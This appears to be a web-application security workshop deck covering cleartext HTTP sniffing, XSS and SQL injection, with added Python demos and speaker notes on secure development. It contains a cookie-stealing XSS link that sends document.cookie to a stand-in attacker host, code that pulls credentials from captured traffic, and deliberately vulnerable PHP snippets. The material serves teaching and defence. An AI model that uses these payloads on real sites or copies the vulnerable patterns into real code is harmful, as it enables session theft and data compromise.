SECURITY WORKSHOP
Topic: WEB APPLICATION
The importance of computer security:
"If you know the enemy and know yourself,
you need not fear the result of a hundred battles"
CONTENTS:
HTTP Hijacking
Cross Site Scripting (XSS) vulnerabilities
SQL Injection vulnerabilities
Part 1: "Stealing" Y/G mail accounts
Story 1: Sniffing
ARP Poisoning
Cain & Abel
User login?
Key 1:
STATEFUL vs STATELESS PROTOCOL
Telnet, FTP, HTTP, ...
HTTP is stateless, so after login the browser re-sends the session cookie with every request; Telnet, FTP and plain HTTP carry that cookie, and the password itself, in cleartext, so anyone who can get onto the path (ARP poisoning) can read them.
Wireshark
Wireless network Sniffing
Monitor mode
Chipset
Driver
Attack
Q & A
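The cleartext capture that Part 1 is about, as an added example that is not part of the original deck: a small Python parser that does by hand what "Follow TCP stream" in Wireshark shows, walking a captured HTTP stream and pulling out the Basic credentials, the login form fields and the session cookie. The capture bytes, the host name, the user, the password and the cookie value are all constructed for this example.

```python
"""Extract credentials and session cookies from a captured cleartext HTTP stream.

Added example, not code from the deck. CAPTURE is a constructed stream
(made-up host, user, password and cookie) of the kind a sniffer on the path
sees once ARP poisoning has routed the victim's traffic through the attacker."""
import base64
from urllib.parse import parse_qs

# Constructed capture: a login POST (Basic header plus a form body), the
# server's response setting a session cookie, and the next request, which
# re-sends that cookie because HTTP itself keeps no state between requests.
CAPTURE = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Authorization: Basic YWxpY2U6cGFzc3dvcmQxMjM=\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"user=alice&pass=password123"
    b"HTTP/1.1 302 Found\r\n"
    b"Set-Cookie: SESSIONID=8f3a2c9d; Path=/\r\n"
    b"Location: /inbox\r\n"
    b"\r\n"
    b"GET /inbox HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Cookie: SESSIONID=8f3a2c9d\r\n"
    b"\r\n"
)

# Set-Cookie attributes that are not cookies themselves.
COOKIE_ATTRS = {"path", "domain", "expires", "max-age", "samesite"}


def parse_messages(stream: bytes):
    """Split one captured stream into (start_line, headers, body) triples.

    Message boundaries come from the blank line after the headers and the
    Content-Length header (0 when absent), which is enough for a capture
    without chunked encoding."""
    messages, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers.setdefault(name.strip().lower(), []).append(value.strip())
        length = int(headers.get("content-length", ["0"])[0])
        body_start = end + 4
        messages.append((lines[0], headers, stream[body_start:body_start + length]))
        pos = body_start + length
    return messages


def extract_secrets(stream: bytes) -> dict:
    """Everything a passive observer learns from the cleartext stream."""
    found = {"basic_auth": [], "form_fields": {}, "cookies": set()}
    for _start_line, headers, body in parse_messages(stream):
        # Basic auth is only base64, not encryption: decode and split user:pass.
        for value in headers.get("authorization", []):
            scheme, _, token = value.partition(" ")
            if scheme.lower() == "basic":
                user, _, password = base64.b64decode(token).decode().partition(":")
                found["basic_auth"].append((user, password))
        # Form logins travel as plain key=value pairs in the body.
        if body and "x-www-form-urlencoded" in headers.get("content-type", [""])[0]:
            for key, values in parse_qs(body.decode("latin-1")).items():
                found["form_fields"][key] = values[0]
        # The session identifier appears when it is issued and on every replay.
        for value in headers.get("set-cookie", []) + headers.get("cookie", []):
            for pair in value.split(";"):
                name, sep, val = pair.strip().partition("=")
                if sep and name.lower() not in COOKIE_ATTRS:
                    found["cookies"].add((name, val))
    return found


if __name__ == "__main__":
    for kind, value in extract_secrets(CAPTURE).items():
        print(kind, value)
```

Note that the replayed cookie in the third message is as valuable as the password: with it the attacker is logged in without ever authenticating. TLS removes the whole problem, and a `Secure` attribute on the session cookie stops the browser from ever sending it over plain HTTP even if an attacker downgrades a link.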
Cross site Scripting (XSS)
Story 2:
Key 2
Client script: javascript, vbscript
<script>
alert(123);
</script>
<script>
location.href='http://nhatnghe.com';
</script>
<script>
alert(document.cookie);
</script>
Any script that runs in the page runs with the page's origin, so it can read document.cookie, the same session identifier sniffed in Part 1 (unless the cookie is marked HttpOnly).
What is XSS?
<?php
// Reflected XSS: the 'search' parameter is echoed straight into the HTML response without escaping.
$tim = $_GET['search'];
echo "Ban da tim tu khoa la: $tim";   // "You searched for the keyword: ..."
?>
What is XSS?
http://victim.com/foo.cgi?q=<html_javascript_exploit_code>...
Exploitation possibilities:
Stealing session cookies
Executing "commands" (script of the attacker's choosing in the victim's browser)
Phishing
Redirecting to another website
Defacing or DoS-ing the web page
Demo
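The reflected XSS from the PHP snippet above, as an added example that is not part of the original deck: a Python port of that snippet (raw interpolation of the search term) beside the output-encoded version, driven by a crafted link that sends document.cookie to the attacker. The page template, the parameter name, the attacker's link and the host names in it are constructed for this example.

```python
"""Reflected XSS: the search page echoes the 'search' parameter into its HTML.

Added example, not code from the deck: a Python port of the PHP snippet on the
page (raw interpolation) next to the output-encoded version. The page template,
the attacker's link and the host names in it are constructed for this example."""
import html
from urllib.parse import parse_qs, urlsplit

PAGE = "<html><body><p>You searched for the keyword: {term}</p></body></html>"

# Constructed attacker link. '+' is sent as %2B so it survives URL decoding;
# the script sends document.cookie to a host the attacker controls.
ATTACK_URL = (
    "http://victim.com/search.php?search="
    "<script>location.href='http://attacker.test/c?'%2Bdocument.cookie</script>"
)


def render_vulnerable(search: str) -> str:
    """Same as: echo "Ban da tim tu khoa la: $tim"; the input lands in the
    page as markup, so a <script> in it is executed by the victim's browser."""
    return PAGE.format(term=search)


def render_safe(search: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the same input is
    displayed as text and never parsed as a tag or attribute."""
    return PAGE.format(term=html.escape(search, quote=True))


def handle_request(url: str, renderer) -> str:
    """Take the 'search' parameter from the requested URL and render the page."""
    params = parse_qs(urlsplit(url).query)
    return renderer(params.get("search", [""])[0])


def script_survives(page: str) -> bool:
    """Tester's check: did a script tag make it into the response as markup?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        page = handle_request(ATTACK_URL, renderer)
        print(name, "script executes:", script_survives(page))
        print(page)
```

Escaping is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a `<script>` block or a URL needs the encoding of that context instead. Marking the session cookie `HttpOnly` limits the damage of the cookie-theft payload, but does nothing against the phishing, redirect and defacement cases listed above.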
Web application
SQL query
Select .... From .... Where
Insert into ...
Update .... Set ....
Delete from ....
SQL Injection
http://site.com/?type=TV
<?php
// SQL injection: the 'type' parameter is concatenated straight into the query text.
$giatri = $_GET['type'];
$SQL = "Select * from sanpham where type='" . $giatri . "'";
?>
SQL Injection
The exploit relies on input variables that are never validated.
The variable's value is used directly inside the database query.
The attacker changes the input value, which alters what the query does and lets them execute SQL commands of their own.
DB: MSSQL & MySQL
Database: information_schema
Table: tables (table_name)
Table: columns (column_name, table_name)
DEMO
Q & A


Editor's Notes

  1. In this session, we will focus on security fundamentals. Specifically, we will discuss: Why application security matters. Secure development practices. The range of security technologies that are available. How developers should consider security at all stages of the development process.
  2. In this agenda topic, we will focus on the importance of application security. Specifically, we will discuss: Trustworthy computing. Connection scenarios and security concerns. Common types of attacks on software systems. Examples of security intrusions. Consequences of poor security. The challenges involved in secure computing. The role of developers in creating secure applications.
  3. Workforce mobility is increasing, and consequently, the way in which employees connect to your company’s network is evolving. Employees connect in a number of different ways, including traditional wired connections, new and evolving wireless network standards, and dial-up and broadband virtual private network (VPN) connections. The variety of ways your mobile users connect to your company’s network introduces a number of security concerns, including: Wireless susceptibility. Although wireless networks can be as secure as wired networks if administered properly, by default, many wireless networks provide the opportunity for any compatible device to connect in an ad-hoc manner. Employee home security. Many employees have wireless networks at home, and may not be aware of the issues that are involved with securing this type of network. Furthermore, always-on broadband connections make home networks (whether wireless or not) more susceptible to viruses and attackers. The potential susceptibility of home networks may result in viruses or attackers gaining access to your corporate network, either when the user connects over a VPN or when they physically plug their computers into the network on your company’s premises. Although virus checkers and firewalls can help secure home networks and broadband connections, it is often difficult for your network administrators to enforce the use of these defences. Employees increasingly use their laptop computers and other mobile devices to connect to wireless networks run by third parties. For example, they might connect to WiFi hotspots in coffee houses, airports, hotels, and other places to check their e-mail or to browse the Internet. Because your company has no control over the security of these public networks, they provide a potential route for attackers or viruses. As with home networks, this may result in viruses or attackers gaining access to your corporate network, either when the user connects over a VPN or when they physically plug their computers into the network on your company’s premises. Applications are becoming increasingly dependent on connections to the Internet, for updated data, Web services, and so on. The Internet is a potential route to your systems for attackers and viruses. Many businesses require a persistent connection to the Internet so that they can provide Web sites, File Transfer Protocol (FTP) sites, and Web services. As already stated, the Internet is a potential route to your systems for attackers and viruses. Security attacks will also still happen from within your enterprise. This could be as simple as an employee who writes down a password which then falls into the wrong hands, or it could be deliberate actions from a disgruntled employee. It is important to remember that security is not just required for public facing connections.
  4. Organizational attacks involve one organization breaking into your network to try to access confidential information, thereby gaining a business advantage. Attackers like to exercise their skill in attempting to bypass security safeguards to gain illegal access to your network. Automated attacks use software to scan for network vulnerabilities, or to implement a brute force attack. Brute force attacks involve trying many different usernames and passwords or other credentials to gain access to your resources. Denial of Service attacks overwhelm a server with requests for action, thereby rendering it incapable of providing its normal service. Viruses, Trojan horses, and worms are harmful programs that act by exploiting some known vulnerability to install themselves on a computer (perhaps by entering as an attachment to an e-mail). Once present on a computer, they distribute copies of themselves to other connected computers, and these copies also replicate themselves, resulting in a viral-like infection of the computer network. Accidental breaches in security often result from poor practices or procedures. For example, the exposure of security information, such as usernames and passwords, can be exploited by an attacker to gain access to your network.
  5. CodeRed is a worm that: Uses randomly generated IP addresses to spread. If the worm infects a vulnerable IIS server, it creates 100 threads first. Out of those initial 100 threads, it uses 99 threads to spread the worm while the 100th thread checks to see if it is running on an English (U.S.) Microsoft Windows NT® or Windows 2000 system. If the infected system is found to be an English (U.S.) system, the worm will proceed to deface the infected system’s website. Exploits an unchecked buffer overrun in Microsoft Index Server 2.0, a component of Internet Information Services (IIS) servers. Includes code designed to overwhelm the www.whitehouse.gov website. ILOVEYOU is a virus that: Is contained in an e-mail attachment called LOVE LETTER FOR YOU.TXT.VBS (a Visual Basic Script file). Relies on the e-mail recipient opening the attachment. Deletes image files and MP3 files. Corrupts the registry. Spreads by copying the e-mail to all users in the address book. Nimda is a virus that: Spreads itself in e-mail attachments named README.EXE. Locates EXE files on the local computer and infects them by copying the virus file inside their body as a resource. These files then spread the infection when users exchange programs such as games. Scans the Internet for vulnerable servers and defaces Web pages on those servers, leading to further propagation of the worm through users browsing the infected sites. Infects network shares, causing any user who opens a Word document on those shares to become infected. Reads e-mail addresses from your e-mail client and also searches local HTML files looking for additional addresses. It then sends one e-mail to each address containing the README.EXE attachment.
  6. Poor security will result in serious damage to your business. Your competitors may gain knowledge of your systems or technology, denying you any competitive advantage. Competitors may also be able to copy your ideas or technology and put them to advantage in their own products. An attack may result in your systems being taken offline while the damage is assessed and rectified. All effort expended combating security attacks and repairing the damage is lost productivity. This time and effort could have been spent pursuing the business goals of your enterprise. Your business reputation will be damaged. When security lapses are reported, the assumption is that if your systems security is bad, then many of your other practices will also be bad. It is easy to come to the conclusion that your products and systems are equally poor. Consumers who are unable to use your website because it has been hacked, or who see a defaced website, will visit your competitors’ websites instead. The financial losses from security intrusions can be substantial. It is difficult to determine the exact cost of issuing a security fix, but the Microsoft Security Response Center believes a security bug that requires a security bulletin costs approximately $100,000.
  7. The challenges faced when implementing security include balancing the advantages that the attacker has over the defenders, and how the degree of security affects users, as well as conveying the message that security does add business value. Attackers vs. Defenders: The defender must protect all points; the attacker can choose the weakest point. The defender must be constantly vigilant; the attacker can attack at any time. Security vs. Usability: Security can be taken to extremes, making the application too difficult to use. Secure developers should strive to make the system as secure as possible, but not to make it impossible to use. Complex and strong passwords are those that must contain a mixture of uppercase and lowercase letters, and possibly punctuation characters. They must also be long – perhaps 9 or more characters in length. However, there is often user resistance to strong passwords, because they are more difficult to remember. As soon as a user decides to write down a password so that they can remember it, your security is compromised. Security As An Afterthought: Security is often seen as a functionality disabler, as something that gets in the way. However, there is nothing more disabling than an attacker being able to get at your sensitive data. There is also a perception that the cost of implementing security is high and the business benefits are unclear. However, the cost of poor security can be very high, and in exceptional circumstances, could result in business failure. Building security in from the start is essential to ensure a robust solution. If security is the last issue addressed, fixing any security vulnerabilities that are discovered may break other product functionality, and in common with any other late changes in the product development cycle, it is much more expensive than designing security in from the start.
  9. Solution architects, developers, and systems administration personnel must all work together and take collective responsibility for security. Developers must adopt good practices that ensure the production of secure software. They must be knowledgeable about security vulnerabilities and how to avoid them, and must have both a broad and deep knowledge about security technologies and how to use them in order to create secure solutions.
  10. A holistic approach to security is required. You must consider security at all project stages and for network, host, and application layers. Even if you have the most secure network infrastructure possible, with completely hardened servers, a simple vulnerability in your application (for example, failing to validate input) renders all of that useless. A holistic approach to security is simply a mindset that developers should adopt. It forms the basis for specific architectures, such as Defense in Depth (DiD), which is explained in the “Writing Secure Code – Best Practices” presentation. In short, you need to "bake security into your application development lifecycle". For step-by-step guidance on how to achieve this, refer to the Patterns and Practices documentation at http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMFastTrack.asp
  11. The Secure Windows Initiative team at Microsoft has adopted a simple set of strategies called SD3. The SD3 framework has three core concepts: Secure by Design, Secure by Default, and Secure in Deployment. These concepts have shaped the development process to help deliver secure systems. Secure by Design means that you have taken the appropriate steps to ensure that the overall design of the product is secure from the outset. Include threat modeling at the design phase and throughout the project to identify potential vulnerabilities. Use secure design, coding, and testing guidelines. Secure by Default means that the product is released so that it is secure out of the box. If features are optional, turn them off by default. If a feature is not activated, then an attacker cannot use it to compromise your product. Ensure that the user accounts your application runs under have only the least privilege it requires. Then a compromise has less serious consequences than if an attacker is able to run malicious code under an account with administrator privileges. Ensure that effective access controls are in place for resources. Secure in Deployment means that the system is maintainable after installation. If a product is difficult to administer, it makes it more difficult to maintain protection against security threats as new ones evolve. Ensure that users are educated to use the system in a secure manner. If a security vulnerability is discovered and a patch is necessary, ensure that the fix is fully tested internally and then issued in a timely manner.
  14. It is crucial that security is built into the entire development lifecycle from architecture and design, through development, testing, deployment, and operations. The activities shown on this slide are iterative and ongoing. These activities are not one-off activities – they continue throughout the development lifecycle.
  16. You cannot build a secure system until you understand your threats, because you will not know what to defend against. Threat modelling is covered in more detail in the “Writing Secure Code – Best Practices” presentation. The threat modelling process is as follows: Assemble the threat-modelling team. Decompose the application and analyze its operation by using data flow diagrams (DFD) or similar. Examine the data flows and use cases and determine the threats to the system. Rank the threats by decreasing risk. Choose how to respond to the threats. Choose techniques to mitigate the threats. Choose the appropriate security technologies for the identified techniques.
  17. An important part of delivering secure systems is raising awareness of the needs for secure programming and keeping all users up to date with ongoing security education. It is important for all team members to understand how security technologies work. Without that knowledge, you cannot be an effective team member when taking part in threat modelling, or in doing security code reviews. However, understanding security technologies on their own does not mean that your application is secure. It is important not only to know how the technologies work, but how to use them to solve security problems. It is essential that programmers know what flawed code looks like so that they can pick up vulnerabilities in code reviews. Developers need to be fully aware of common security mistakes and know how to avoid or rectify them. Analysis of any vulnerable code is important so that the same mistake can be avoided in the future, and similar vulnerabilities elsewhere in the product can be identified and resolved.